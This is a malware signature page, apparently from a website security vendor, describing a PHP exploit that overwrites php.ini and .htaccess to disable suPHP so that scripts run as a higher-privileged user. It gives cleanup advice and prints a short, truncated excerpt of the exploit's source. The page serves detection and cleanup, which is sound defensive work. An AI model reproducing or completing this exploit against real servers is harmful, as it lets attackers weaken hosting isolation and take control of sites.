Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.exploit.suphp.001.002

php.exploit.suphp.001.002

PHP exploits are server-side malicious scripts which are commonly used as exploit. Exploit is piece of code that takes advantage of a bug, glitch or vulnerability, usually to gain control of a system it aims on. Typical targets are admin sections of various Content Management Systems or Website Administration Systems such as cPanel and others.
This php script modifies php.ini and .htaccess files in order to disable suPHP on the server. Having this option set off, php scripts will run as a high level user.

Affecting

Any vulnerable website

Cleanup

Cleanup is done by deleting the malicious file and setting up the right suPHP options.
You can also sign up with us and let our team remove the malware for you.

Dump

f<?

/*

apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit

Author : cyb3r-ps

Home : gaza-hacker.net
note : this exploit for education :)

*/

echo "[+] Start...n";

$bypfile=fopen('php.ini','w+');

$stuffile=fopen('.htaccess','w+');

if($bypfile and $stuffile!= NULL){

echo "[+] evil files created succes ! n";